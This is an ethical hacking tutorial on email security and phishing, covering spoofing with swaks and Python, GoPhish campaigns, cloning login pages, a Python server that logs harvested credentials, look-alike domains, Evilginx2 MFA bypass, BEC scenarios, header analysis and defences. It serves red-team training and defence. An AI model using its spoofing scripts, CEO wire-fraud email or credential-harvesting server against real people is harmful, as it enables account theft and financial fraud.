Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
What will I learn
- How email actually works -- SMTP, MX records, and the authentication chain (SPF, DKIM, DMARC);
- Email spoofing -- how attackers forge sender addresses and what stops them (or doesn't);
- Phishing infrastructure -- building convincing phishing campaigns for authorized red team engagements;
- GoPhish -- setting up and running an authorized phishing simulation;
- Credential harvesting pages -- cloning login pages, capturing credentials, and evasion techniques;
- Email header analysis -- forensically tracing the origin of a suspicious email;
- Business Email Compromise (BEC) -- the billion-dollar attack that requires zero technical skill;
- Defense: SPF, DKIM, DMARC enforcement, user training, email gateway filtering.
Requirements
- A working modern computer running macOS, Windows or Ubuntu;
- A domain you control (for phishing simulation lab);
- Understanding of DNS from Episode 3;
- The ambition to learn ethical hacking and security research.
Difficulty
- Intermediate
Curriculum (of the Learn Ethical Hacking series):
- Learn Ethical Hacking (#1) - Why Hackers Win
- Learn Ethical Hacking (#2) - Your Hacking Lab
- Learn Ethical Hacking (#3) - How the Internet Actually Works - For Attackers
- Learn Ethical Hacking (#4) - Reconnaissance - The Art of Not Being Noticed
- Learn Ethical Hacking (#5) - Active Scanning - Mapping the Attack Surface
- Learn Ethical Hacking (#6) - The AI Slop Epidemic - Why AI-Generated Code Is a Security Disaster
- Learn Ethical Hacking (#7) - Passwords - Why Humans Are the Weakest Cipher
- Learn Ethical Hacking (#8) - Social Engineering - Hacking the Human
- Learn Ethical Hacking (#9) - Cryptography for Hackers - What Protects Data (and What Doesn't)
- Learn Ethical Hacking (#10) - The Vulnerability Lifecycle - From Discovery to Patch to Exploit
- Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection
- Learn Ethical Hacking (#12) - SQL Injection - The Bug That Won't Die
- Learn Ethical Hacking (#13) - SQL Injection Advanced - Extracting Entire Databases
- Learn Ethical Hacking (#14) - Cross-Site Scripting (XSS) - Injecting Code Into Browsers
- Learn Ethical Hacking (#15) - XSS Advanced - Bypassing Filters and CSP
- Learn Ethical Hacking (#16) - Cross-Site Request Forgery - Making Users Attack Themselves
- Learn Ethical Hacking (#17) - Authentication Bypass - Getting In Without a Password
- Learn Ethical Hacking (#18) - Server-Side Request Forgery - Making Servers Betray Themselves
- Learn Ethical Hacking (#19) - Insecure Deserialization - Code Execution via Data
- Learn Ethical Hacking (#20) - File Upload Vulnerabilities - When Users Upload Weapons
- Learn Ethical Hacking (#21) - API Security - The New Attack Surface
- Learn Ethical Hacking (#22) - Business Logic Flaws - When the Code Works But the Logic Doesn't
- Learn Ethical Hacking (#23) - Client-Side Attacks - Beyond XSS
- Learn Ethical Hacking (#24) - Content Management Systems - Hacking WordPress and Friends
- Learn Ethical Hacking (#25) - Web Application Firewalls - Bypassing the Guards
- Learn Ethical Hacking (#26) - The Full Web Pentest - Methodology and Reporting
- Learn Ethical Hacking (#27) - Bug Bounty Hunting - Getting Paid to Hack the Web
- Learn Ethical Hacking (#28) - The AI Web Attack Surface - AI Features as Vulnerabilities
- Learn Ethical Hacking (#29) - Network Sniffing - Seeing Everything on the Wire
- Learn Ethical Hacking (#30) - Wireless Network Attacks - Breaking Wi-Fi
- Learn Ethical Hacking (#31) - Privilege Escalation - Linux
- Learn Ethical Hacking (#32) - Privilege Escalation - Windows
- Learn Ethical Hacking (#33) - Active Directory Attacks - The Crown Jewels
- Learn Ethical Hacking (#34) - Pivoting and Lateral Movement - Spreading Through Networks
- Learn Ethical Hacking (#35) - Cloud Security - AWS Attack and Defense
- Learn Ethical Hacking (#36) - Cloud Security - Azure and GCP
- Learn Ethical Hacking (#37) - Container Security - Docker and Kubernetes Attacks
- Learn Ethical Hacking (#38) - Infrastructure as Code - Securing the Automation
- Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense (this post)
Solutions to Episode 38 Exercises
Exercise 1: Secret scanning with trufflehog and gitleaks.
# Create test repo with a fake AWS key
mkdir secret-test && cd secret-test && git init
echo 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE' > config.env
echo 'AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' >> config.env
git add . && git commit -m "add config"
git rm config.env && git commit -m "remove secrets"
# Scan with trufflehog
trufflehog git file://./
# Detected: AWS key in commit history (even though file deleted)
# Scan with gitleaks
gitleaks detect --source . --verbose
# Detected: 2 secrets (access key + secret key)
# Pre-commit hook setup
cat > .pre-commit-config.yaml << 'EOF'
repos:
- repo: https://github.com/gitleaks/gitleaks
rev: v8.18.0
hooks:
- id: gitleaks
EOF
pre-commit install
# Test: try to commit a new secret
echo 'GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' > new.env
git add new.env && git commit -m "oops"
# BLOCKED by pre-commit hook
Both tools found the AWS credentials in the original commit even after the file was deleted. trufflehog detected the secrets using both entropy analysis and regex patterns, reporting the exact commit hash and line. gitleaks produced a similar report with a structured JSON output showing the matched rule, the offending line, and the commit. The key difference: trufflehog also tries to verify whether the credential is still active (the --only-verified flag), which is useful for triage. gitleaks is faster for pure pattern matching. The pre-commit hook blocked the GITHUB_TOKEN commit instantly -- the commit never happened, so the secret never entered git history. This is why pre-commit hooks are the first line of defense, not CI scanning (which only fires after the secret is already in the remote).
Exercise 2: Terraform security scanning.
# Deliberately insecure config:
resource "aws_s3_bucket" "data" {
bucket = "company-data"
acl = "public-read" # Issue 1: public bucket
}
resource "aws_db_instance" "main" {
engine = "mysql"
username = "admin"
password = "admin123" # Issue 2: hardcoded password
}
resource "aws_security_group" "web" {
ingress {
from_port = 22
to_port = 22
cidr_blocks = ["0.0.0.0/0"] # Issue 3: SSH open to world
}
}
tfsec results:
CRITICAL: aws_db_instance.main has hardcoded password
CRITICAL: aws_s3_bucket.data has public-read ACL
HIGH: aws_security_group.web allows SSH from 0.0.0.0/0
HIGH: aws_s3_bucket.data missing encryption
MEDIUM: aws_s3_bucket.data missing logging
Checkov results:
CKV_AWS_16: FAILED - RDS instance not encrypted
CKV_AWS_17: FAILED - RDS logging not enabled
CKV_AWS_20: FAILED - S3 bucket has public ACL
CKV_AWS_145: FAILED - S3 missing KMS encryption
CKV_AWS_24: FAILED - Security group allows SSH from 0.0.0.0/0
+ hardcoded password detected
Both tools caught all three deliberate issues. tfsec focused on Terraform-specific patterns and gave clear remediation guidance per finding. Checkov mapped each finding to a specific CKV benchmark ID and also flagged additional issues (missing encryption at rest for both RDS and S3, missing access logging) that tfsec surfaced as lower-severity warnings. Running both tools in CI is the pattern -- tfsec for Terraform-specific depth, Checkov for broad multi-framework coverage.
Exercise 3: Codecov supply chain attack analysis.
Attack timeline:
- Jan 31 2021: Attackers modify Codecov bash uploader in Docker image
- The script was fetched by thousands of CI pipelines every build
- Modified script exfiltrated CI environment variables to
attacker-controlled server (a single extra curl command)
- April 1 2021: Discovered by a customer who noticed the
script's checksum didn't match the published hash
- Duration undetected: 2 months
Impact:
- Thousands of repos affected
- Major disclosures: HashiCorp (leaked GPG signing key),
Twitch (source code), and others
- Every CI pipeline using the Codecov uploader leaked ALL
environment variables -- AWS keys, deploy tokens, API secrets
Why detection failed:
- Script was fetched fresh each build (no pinned version)
- No integrity check (checksum/signature verification)
- Exfiltration was a single curl to an attacker server --
blended in with normal CI network traffic
- No egress filtering on CI runners
Prevention:
- Pin script to specific SHA/version, not :latest
- Verify script checksum before execution
- Use OIDC authentication (no long-lived secrets in CI env)
- Egress filtering (block unknown outbound connections)
- Use the Codecov GitHub Action instead of curl | bash
The Codecov attack is the textbook supply chain compromise: modify one widely-used script, and every downstream CI pipeline running it delivers your payload. The curl | bash pattern -- fetching a remote script and executing it inline -- is inherently insecure because you're trusting the remote server to serve the same content every time. Pinning to a specific commit hash and verifying the checksum before execution would have caught the modification immediately.
Learn Ethical Hacking (#39) - Email Security - Phishing Infrastructure and Defense
Episode 38 covered Infrastructure as Code security -- Terraform state file exposure, git repository secrets, CI/CD pipeline attacks, Jenkins as a legacy goldmine, Ansible Vault traps, CloudFormation and ARM template misconfigurations, and Policy as Code with tfsec and Checkov. You can now find secrets buried in git history with trufflehog, scan IaC files before deployment, and understand why a single misconfigured line in Terraform can replicate across hundreds of resources.
But all of that -- the cloud exploits, the container escapes, the IaC misconfigurations, the privilege escalation chains -- assumes the attacker is already inside the network or has some form of access. And in the real world, the question that matters most is: how does an attacker get that initial access in the first place?
The answer, consistently, year after year, report after report: email. Verizon's Data Breach Investigations Report has put phishing as the number one initial access vector for over a decade. Not zero-days. Not supply chain attacks. Not misconfigured cloud services. Plain old email. Someone receives a message, clicks a link, enters their credentials, and the attacker walks in through the front door.
Here we go.
Email -- The Protocol That Was Never Designed to Be Secure
SMTP was defined in 1982 (RFC 821, later updated as RFC 5321). To put that in context: this was a year before TCP/IP became the standard protocol for ARPANET, and a decade before the World Wide Web existed. The designers of SMTP were building a messaging system for a trusted network of academic institutions and government labs. Authentication? Encryption? Sender verification? None of those were design requirements. The protocol was built on the implicit assumption that everyone on the network was who they said they were.
That assumption was wrong then and it's catastrophically wrong now, but we're still running the same protocol. Every security mechanism bolted onto email -- SPF (2003, published as RFC in 2006), DKIM (2007), DMARC (2012, published 2015) -- is a patch on top of a protocol that was never designed to be secure. And patches on insecure foundations have a consistent track record: they help, but they don't solve the fundamental problem.
Your mail client
-> Your SMTP server (port 25/587)
-> DNS lookup: MX record for recipient domain
-> Recipient's MX server (port 25)
-> Recipient's mailbox
|
|-- Authentication checks: SPF, DKIM, DMARC
|-- Spam filters: content analysis, reputation
|-- The "From:" header? Just a text field.
The critical vulnerability that makes email spoofing possible: the "From" header is just a text field. There is nothing in the SMTP protocol that prevents you from setting it to any address you want. When you send an email, your SMTP server does not verify that you are authorized to send as that address. It just takes whatever you give it and passes it along. The recipient's server might check (if SPF, DKIM, and DMARC are configured), but the SENDING side has zero enforcement.
This is like being able to write any return address on a physical envelope. The post office delivers it regardless -- and the recipient sees whatever return address the sender chose to write.
Email Spoofing -- The Foundation of Phishing
Let me show you how trivially easy it is to spoof a sender address. This is why email authentication exists -- and why it's so important to get right:
# swaks -- the Swiss Army Knife for SMTP testing
# Install: apt install swaks
# Send a spoofed email
swaks --to target@example.com \
--from ceo@example.com \
--header "Subject: Urgent - Wire Transfer Needed" \
--body "Please wire $50,000 to account 9876543. This is time-sensitive." \
--server mail.example.com \
--port 25
# With more convincing headers
swaks --to finance@company.com \
--from "John Smith, CEO <[email protected]>" \
--header "Subject: RE: Q3 Acquisition - Final Step" \
--header "Reply-To: [email protected]" \
--header "X-Mailer: Microsoft Outlook 16.0" \
--body "$(cat phishing_body.txt)" \
--server mail.company.com
# Python approach -- using smtplib
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
msg = MIMEMultipart()
msg['From'] = '[email protected]'
msg['To'] = '[email protected]'
msg['Subject'] = 'RE: Urgent Wire Transfer - Confidential'
msg['Reply-To'] = '[email protected]'
body = """Hi Sarah,
I need you to process a wire transfer of $200,000 to the
account below before end of day. This is for the acquisition
we discussed last week. Please keep this confidential until
the deal closes.
Account: 12345678
Routing: 987654321
Bank: First National
Thanks,
John Smith
CEO, TargetCompany Inc.
"""
msg.attach(MIMEText(body, 'plain'))
# Whether this works depends ENTIRELY on the target's
# SPF, DKIM, and DMARC configuration
with smtplib.SMTP('target-mx.targetcompany.com', 25) as server:
server.sendmail(
'[email protected]',
'[email protected]',
msg.as_string()
)
Whether these spoofed emails actually reach the inbox depends on three layers of authentication that the recipient's domain may (or may not) have configured. And the emphasis here is on "may" -- a surprising number of organizations have incomplete or ineffective email authentication, even in 2026.
SPF -- Who Is Allowed to Send for This Domain?
SPF (Sender Policy Framework) is a DNS TXT record that declares which IP addresses and mail servers are authorized to send email on behalf of a domain. When a receiving server gets an email claiming to be from [email protected], it looks up the SPF record for company.com and checks whether the sending server's IP address is in the authorized list:
# Check a domain's SPF record
dig TXT company.com | grep spf
# Typical SPF record:
# v=spf1 include:_spf.google.com include:amazonses.com ip4:203.0.113.0/24 -all
# Breaking it down:
# v=spf1 -- SPF version 1
# include:_spf.google.com -- Google Workspace is authorized
# include:amazonses.com -- Amazon SES is authorized
# ip4:203.0.113.0/24 -- this IP range is authorized
# -all -- REJECT everything else (hard fail)
# The "-all" vs "~all" distinction is CRITICAL:
# -all = hard fail: reject unauthorized senders (SECURE)
# ~all = soft fail: accept but mark suspicious (WEAK)
# ?all = neutral: do nothing (USELESS)
# +all = pass everything (BROKEN -- allows anyone to spoof)
# Common misconfigured SPF records:
dig TXT vulnerable-company.com
# v=spf1 ~all
# This is soft fail -- most receiving servers accept anyway
# Attacker can spoof this domain with minimal friction
dig TXT really-vulnerable.com
# (no SPF record at all)
# No SPF = no sender verification = anyone can spoof
The soft fail (~all) problem is endamic. Organizations set ~all during initial SPF setup because "we want to monitor first and make sure we don't block legitimate email." The intention is to switch to -all (hard fail) after confirming that all legitimate senders are in the SPF record. In practice, the switch never happens. The "monitoring period" becomes permanent. And ~all provides almost no protection because most receiving servers treat soft fail the same as no SPF at all -- the email gets delivered, maybe with a slightly higher spam score.
I've done SPF assessments for organizations that had ~all in their SPF record for years. When I asked why they hadn't switched to hard fail, the answer was always some variant of "we're afraid of blocking legitimate email." The fear is understandable but backwards -- the risk of a spoofed email causing a BEC incident (which we'll get to later) is orders of magnitude higher than the risk of temporarily blocking one legitimate sender while debugging the SPF record.
DKIM -- Cryptographic Proof of Origin
DKIM (DomainKeys Identified Mail) adds a cryptographic signature to outgoing emails. The sending server signs selected headers and the message body with a private key. The public key is published in DNS. The receiving server retrieves the public key and verifies the signature:
# Check for DKIM public key in DNS
# You need the selector (found in DKIM-Signature header)
dig TXT google._domainkey.company.com
# Returns: v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GN...
# In the email headers, a DKIM signature looks like:
# DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
# d=company.com; s=google;
# h=from:to:subject:date:message-id:mime-version;
# bh=47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=;
# b=dGhpcyBpcyBhIGZha2Ugc2lnbmF0dXJlIGJ1dCBp...
# d= is the signing domain
# s= is the selector (used to find the public key in DNS)
# h= lists which headers were signed
# bh= is the body hash
# b= is the signature
DKIM is stronger than SPF because it's cryptographic -- you can't forge a valid DKIM signature without the private key. But DKIM alone has a critical limitation: it only proves that the email was signed by a key associated with a specific domain. It does NOT enforce that the "From" address matches the signing domain. An attacker could sign an email with their own domain's DKIM key while setting the "From" address to [email protected]. The DKIM signature is valid (for the attacker's domain), but the "From" address is still spoofed.
This is why you need the third piece of the puzzle.
DMARC -- Tying It All Together
DMARC (Domain-based Message Authentication, Reporting, and Conformance) is the policy layer that ties SPF and DKIM together. It tells receiving servers: "if an email claims to be from my domain and fails BOTH SPF and DKIM alignment, here's what you should do with it."
# Check DMARC record
dig TXT _dmarc.company.com
# Strong DMARC (secure):
# v=DMARC1; p=reject; rua=mailto:[email protected]; pct=100
# p=reject -- reject emails that fail authentication (STRONGEST)
# pct=100 -- apply to 100% of email (not sampling)
# Medium DMARC:
# v=DMARC1; p=quarantine; rua=mailto:[email protected]
# p=quarantine -- send failures to spam folder
# Useless DMARC:
# v=DMARC1; p=none; rua=mailto:[email protected]
# p=none -- do nothing except send reports
# This provides ZERO protection against spoofing
# But it's the default starting point and many never change it
The critical concept is alignment. DMARC checks that the domain in the "From" header aligns with either the SPF domain (the envelope sender's domain) or the DKIM signing domain. If neither aligns, the DMARC policy is applied. With p=reject, the email is dropped. With p=none, it's delivered anyway.
# Quick recon script to check email security for a target domain
#!/bin/bash
DOMAIN=$1
echo "=== Email Security Assessment for $DOMAIN ==="
echo -e "\n--- SPF ---"
dig +short TXT "$DOMAIN" | grep spf
# Check for -all vs ~all vs ?all
echo -e "\n--- DMARC ---"
dig +short TXT "_dmarc.$DOMAIN"
# Check for p=reject vs p=quarantine vs p=none
echo -e "\n--- MX Records ---"
dig +short MX "$DOMAIN"
# Shows which mail servers handle this domain
echo -e "\n--- Common DKIM Selectors ---"
for sel in google default selector1 selector2 s1 s2 k1 mail smtp; do
result=$(dig +short TXT "${sel}._domainkey.${DOMAIN}" 2>/dev/null)
if [ -n "$result" ]; then
echo "Selector '$sel': FOUND"
fi
done
The reconnaissance value of this is significant. If a target domain has no SPF, no DMARC, or DMARC with p=none, you know immediately that you can spoof emails from that domain with high deliverability. If they have p=reject and a tight SPF with -all, spoofing that specific domain is much harder (though you can still use look-alike domains, which we'll cover shortly).
Having said that, even p=reject is not bulletproof. DMARC only protects the exact domain in the From header. It does NOT protect against:
- Cousin domains:
company-support.cominstead ofcompany.com - Display name spoofing:
"CEO John Smith" <[email protected]>-- the display name says CEO, the actual address is a gmail - Compromised accounts: if the attacker has actual access to a legitimate mailbox, DMARC can't help because the email IS legitimately from that domain
GoPhish -- Professional Phishing Simulation
GoPhish (https://github.com/gophish/gophish) is the standard open-source framework for authorized phishing simulations. It provides a complete workflow: create email templates, build landing pages, import target lists, launch campaigns, and track results in real-time:
# Download and start GoPhish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
chmod +x gophish
./gophish
# Web UI: https://localhost:3333
# Default creds: admin / gophish (change immediately)
# The listener (phishing server) runs on port 80 by default
# GoPhish workflow:
# 1. Sending Profile -- configure SMTP server
# - Your lab SMTP server (Postfix) or a transactional sender
# - Set the "From" address for phishing emails
#
# 2. Email Template -- craft the phishing email
# - HTML editor with variable support
# - {{.FirstName}}, {{.LastName}}, {{.Position}}
# - Add tracking image (1x1 pixel, reports when email is opened)
# - Include {{.URL}} -- GoPhish's tracking link
#
# 3. Landing Page -- the credential harvesting page
# - "Import Site" clones any URL automatically
# - Enable "Capture Submitted Data"
# - Enable "Capture Passwords"
# - Set redirect URL (send user to real site after capture)
#
# 4. Users & Groups -- import target list
# - CSV: First Name, Last Name, Email, Position
#
# 5. Campaign -- bring it all together
# - Select: sending profile, template, landing page, user group
# - Set launch date (immediate or scheduled)
# - Launch
#
# 6. Results Dashboard
# - Email sent / Email opened / Link clicked / Data submitted
# - Per-user tracking with timestamps
# - Export results as CSV for reporting
Building a Convincing Phishing Page
The landing page is where credentials are actually captured. GoPhish's "Import Site" feature makes this trivially easy -- point it at any login page and it clones the HTML, CSS, and images automatically. But for red team engagements where realism matters, you want to go further:
# Clone a login page with wget (more thorough than GoPhish's importer)
wget --mirror --convert-links --adjust-extension \
--page-requisites --no-parent \
https://login.targetcompany.com/
# Or with httrack for more complex sites
httrack "https://login.targetcompany.com/" \
-O "/tmp/phishing-site" \
"+*.targetcompany.com/*" -v
# Register a convincing look-alike domain
# targetcompany.com -> target-company.com (hyphenation)
# targetcompany.com -> targetcompany.co (TLD swap)
# targetcompany.com -> targetcornpany.com (rn looks like m)
# targetcompany.com -> targetcompany-sso.com (subdomain style)
# targetcompany.com -> targetcompamy.com (adjacent key: n->m)
# Get a legitimate TLS certificate (free, automated)
certbot certonly --standalone -d login.target-company.com
# Now your phishing page has a valid HTTPS padlock
# Users have been trained to "look for the padlock" -- which
# proves NOTHING about the legitimacy of the site, only that
# the connection is encrypted
# Simple credential harvesting server (for lab use)
from http.server import HTTPServer, SimpleHTTPRequestHandler
import urllib.parse
import datetime
class PhishHandler(SimpleHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
params = urllib.parse.parse_qs(post_data.decode())
# Log captured credentials
timestamp = datetime.datetime.now().isoformat()
with open('captured_creds.log', 'a') as f:
f.write(f"[{timestamp}] {self.client_address[0]}\n")
for key, values in params.items():
f.write(f" {key}: {values[0]}\n")
f.write("\n")
# Redirect to real login page (user thinks login failed)
self.send_response(302)
self.send_header('Location', 'https://login.targetcompany.com/')
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), PhishHandler)
# Add TLS with your certbot certificate
import ssl
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain('fullchain.pem', 'privkey.pem')
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
The redirect after credential capture is a classic technique -- the user enters their password, gets redirected to the real login page, thinks "hmm, must have mistyped," enters their password again on the legitimate site, and logs in successfully. They never suspect anything happened. The attacker has their credentials. The user has a slightly confused memory of "the login was weird for a second."
For authorized engagements, this technique needs to be documented in the scope agreement and the captured credentials need to be handled according to the rules of engagement (typically: hash immediately, never store in plaintext, delete after reporting).
Phishing Infrastructure for Red Teams
Professional red team phishing requires more than GoPhish on a VPS. The infrastructure needs to survive email filters, avoid blacklists, and maintain operational security:
# Infrastructure checklist for a red team phishing engagement:
# 1. Domain age and reputation
# Register the look-alike domain at LEAST 2 weeks before the campaign
# Brand new domains have zero reputation and get flagged immediately
# Send legitimate test emails first to build reputation with major
# providers (Gmail, O365, Yahoo)
# 2. DNS setup
# Set proper PTR record (reverse DNS) for your sending IP
# Configure SPF for YOUR phishing domain (ironic, right?)
dig TXT phishing-domain.com
# v=spf1 ip4:YOUR.SERVER.IP -all
# Configure DKIM signing
# Configure DMARC
dig TXT _dmarc.phishing-domain.com
# v=DMARC1; p=reject
# 3. The phishing domain itself MUST have proper email auth
# This is counter-intuitive: you're spoofing your own domain
# not the target's. The email says "IT Support <[email protected]>"
# and the email is LEGITIMATELY from target-company.com (your domain)
# with valid SPF, DKIM, and DMARC -- because you OWN that domain
# 4. Email sending rate limiting
# Don't blast 500 emails in 10 seconds
# Stagger sends over hours (GoPhish supports this)
# Major providers throttle or block sudden volume spikes
# 5. Categorize your domain with web proxy vendors
# Submit your domain to Blue Coat, Zscaler, Palo Alto for categorization
# Request: "Business" or "Technology" category
# Uncategorized domains are often blocked by enterprise web proxies
Email Header Analysis -- Forensic Investigation
When you receive a suspicious email -- or when you're investigating an incident -- the email headers tell the complete story of where that email actually came from, regardless of what the "From" field says:
# Key headers to examine (read BOTTOM-UP for chronological order):
# Received: -- each mail server adds a Received header as the email
# passes through it. The bottom-most Received header is the original
# sender. The top-most is the last server before your mailbox.
# Return-Path: -- the envelope sender (harder to spoof than From:)
# Authentication-Results: -- SPF/DKIM/DMARC verification results
# X-Originating-IP: -- the sender's IP (if the server adds it)
# Message-ID: -- unique identifier, domain part should match sender
# X-Mailer: -- the email client used (useful for profiling)
# Email header analysis script
import email
import re
import sys
def analyze_headers(eml_file):
with open(eml_file) as f:
msg = email.message_from_file(f)
print("=== Email Header Analysis ===\n")
# Display sender info
print(f"From: {msg['From']}")
print(f"Reply-To: {msg.get('Reply-To', 'not set')}")
print(f"Return-Path: {msg['Return-Path']}")
print(f"Message-ID: {msg['Message-ID']}")
print(f"X-Mailer: {msg.get('X-Mailer', 'not set')}")
# Check for From/Return-Path mismatch (spoofing indicator)
from_domain = msg['From'].split('@')[-1].rstrip('>')
return_path = msg.get('Return-Path', '')
rp_domain = return_path.split('@')[-1].rstrip('>') if '@' in return_path else ''
if from_domain != rp_domain and rp_domain:
print(f"\n*** WARNING: From domain ({from_domain}) != "
f"Return-Path domain ({rp_domain}) ***")
print(" This is a strong spoofing indicator")
# Authentication results
auth = msg.get('Authentication-Results', 'not present')
print(f"\nAuthentication-Results:\n {auth}")
# Trace the delivery path (Received headers, bottom-up)
received = msg.get_all('Received', [])
print(f"\n=== Delivery Path ({len(received)} hops) ===")
for i, hop in enumerate(reversed(received)):
# Extract IP addresses from the hop
ips = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', hop)
hop_clean = ' '.join(hop.split())[:120]
print(f"\nHop {i+1}: {hop_clean}...")
if ips:
print(f" IPs: {', '.join(ips)}")
# Red flags check
print("\n=== Red Flags ===")
flags = []
if 'spf=fail' in auth.lower() or 'spf=softfail' in auth.lower():
flags.append("SPF failed or softfailed")
if 'dkim=fail' in auth.lower():
flags.append("DKIM verification failed")
if 'dmarc=fail' in auth.lower():
flags.append("DMARC check failed")
if from_domain != rp_domain and rp_domain:
flags.append("From/Return-Path domain mismatch")
if msg.get('Reply-To') and msg['Reply-To'] != msg['From']:
flags.append("Reply-To differs from From (replies go elsewhere)")
if flags:
for flag in flags:
print(f" [!] {flag}")
else:
print(" No obvious red flags detected (does NOT mean safe)")
if __name__ == '__main__':
analyze_headers(sys.argv[1])
The Reply-To header is a subtle but important attack vector. An attacker sends an email with From: [email protected] (spoofed) but Reply-To: [email protected]. If the employee hits "Reply" instead of composing a new message, their response goes to the attacker's address, not the CEO's. This enables back-and-forth conversation with the victim -- the attacker can answer questions, provide fake context, and build trust over multiple exchanges. It's far more convincing than a single phishing email because it mimics a real conversation.
Business Email Compromise -- The Billion-Dollar Attack
BEC (Business Email Compromise) is the most financially destructive cyberattack category in existence. The FBI's Internet Crime Complaint Center reported over $50 billion in global losses from BEC between 2013 and 2022. Not ransomware. Not data breaches. Email fraud -- someone sends a convincing email and money gets wired to the wrong account.
The attack requires zero technical sophistication. No malware. No exploits. No vulnerability in any software. Just a convincing email that appears to come from someone with authority:
Typical BEC scenarios:
1. CEO Fraud
Attacker impersonates the CEO, emails the CFO or finance team
"Wire $200,000 to this account for the acquisition we discussed"
Finance wires the money. Money is gone.
2. Vendor Impersonation
Attacker compromises a vendor's email (or spoofs it)
"Our banking details have changed. Please update your records."
Sends a legitimate-looking invoice with new (attacker) bank details
Company pays the next invoice to the attacker
3. Payroll Diversion
Attacker impersonates an employee, emails HR
"Please update my direct deposit to this new account"
HR updates the payroll record
Next paycheck goes to the attacker
4. Attorney Impersonation
Attacker poses as the company's law firm during M&A activity
"Wire the escrow funds to this account immediately"
Sense of urgency + legal authority = compliance without verification
The defenses against BEC are procedural, not technical. No email filter can reliably distinguish a legitimate CEO request from a spoofed one, especially if the attacker has done their homework (researching the company's M&A activity on LinkedIn, knowing the CFO's name, mimicing the CEO's writing style from public posts):
BEC defense checklist:
1. Out-of-band verification for ALL financial requests
- Wire transfer request via email? CALL the requester on their
known phone number (not the one in the email)
- Use a DIFFERENT communication channel to verify: Teams, Signal, phone
- The email says "I'm in a meeting, can't take calls"?
That IS the red flag
2. Dual authorization for transfers above threshold
- No single person can authorize a wire transfer over $10K
- Two approvers from different teams/levels
3. Vendor payment change verification
- Any request to change vendor banking details requires
calling the vendor's known contact number
- Not the number in the email. The number in your CRM.
4. Email banners for external mail
- [EXTERNAL] tag on all emails from outside the organization
- If the CEO's email has [EXTERNAL], something is wrong
5. Domain monitoring
- Monitor certificate transparency logs for look-alike domains
- Register common typosquats of your own domain proactively
I cannot stress this enough: BEC is not a "technical" attack. It's a social engineering attack that happens to use email as the delivery mechanism. We covered social engineering in episode 8, and BEC is the most expensive manifestation of those principles. The attacker exploits authority ("the CEO said to do it"), urgency ("this must be done today"), and trust ("this email looks exactly like our CEO's normal style"). The technical controls help -- SPF/DKIM/DMARC prevent domain spoofing -- but they don't stop an attacker who compromises the actual CEO's mailbox, or who uses a convincing look-alike domain, or who simply spoofs the display name with a different underlying address.
Advanced Phishing Techniques
Beyond basic email spoofing, modern phishing campaigns use increasingly sophisticated techniques:
# 1. Evilginx2 -- man-in-the-middle phishing proxy
# Instead of cloning a login page, Evilginx2 acts as a reverse proxy
# between the victim and the real login page
# The victim authenticates against the REAL site through Evilginx2
# Evilginx2 captures the session token AFTER MFA is completed
# Result: attacker gets a fully authenticated session, MFA bypassed
# Install Evilginx2
evilginx2 -p /path/to/phishlets
# Configure a phishlet (e.g., O365)
phishlets hostname o365 login.target-company.com
phishlets enable o365
lures create o365
# The victim visits: https://login.target-company.com (your domain)
# They see the REAL Microsoft login page (proxied)
# They enter their password + MFA code
# Evilginx2 captures the authenticated session cookie
# Attacker can now use that cookie to access the victim's account
# without knowing their password or having their MFA device
# 2. QR Code phishing (Quishing)
# Email contains a QR code instead of a clickable link
# "Scan this QR code to verify your account"
# QR codes bypass email link scanners (they analyze URLs, not images)
# The URL embedded in the QR code leads to the phishing page
# Works especially well because mobile devices have weaker URL
# inspection than desktops
# 3. HTML smuggling
# Attach an HTML file that constructs and downloads a payload
# client-side using JavaScript. The attachment itself contains
# no malware -- just JavaScript that assembles the payload in
# the browser. Email gateways scanning the attachment find only
# HTML and JavaScript, not the actual malware.
The Evilginx2 reverse proxy technique deserves special attention because it defeats MFA. Traditional phishing captures a password. The user enables MFA and thinks they're safe. Evilginx2 doesn't capture the password at all -- it captures the session cookie that's issued AFTER the user completes both password entry and MFA verification. The user interacts with the real login page (proxied through the attacker's server), completes the full authentication flow including MFA, and the attacker steals the resulting session. This is why phishing-resistant MFA methods (FIDO2, hardware keys) are gaining traction -- they bind the authentication to the specific domain, so a proxied login page on login.target-company.com (attacker domain) won't trigger the hardware key that's registered for login.microsoftonline.com ;-)
Defense: Securing Email
# Layer 1: Email Authentication (SPF + DKIM + DMARC)
# SPF -- hard fail, list ALL authorized senders
# DNS TXT record:
# v=spf1 include:_spf.google.com include:amazonses.com -all
# ^^^^
# MUST be -all (hard fail), NOT ~all (soft fail)
# DKIM -- enable signing on your mail server
# Google Workspace: Admin Console > Apps > Gmail > Authenticate email
# Microsoft 365: Defender portal > Email authentication > DKIM
# DMARC -- enforce reject policy
# DNS TXT record for _dmarc.yourdomain.com:
# v=DMARC1; p=reject; rua=mailto:[email protected]; pct=100
# Layer 2: Email Gateway / Secure Email Gateway (SEG)
# - Sandbox all attachments (detonate in isolated environment)
# - Rewrite URLs for time-of-click analysis (check URL reputation
# when the user clicks, not when the email was received)
# - Strip macros from Office documents
# - Flag or block emails with lookalike domains
# - Add [EXTERNAL] banner to all inbound email from outside the org
# Layer 3: Anti-phishing Technical Controls
# - Implement FIDO2/WebAuthn for phishing-resistant MFA
# - Deploy browser extensions that warn on lookalike domains
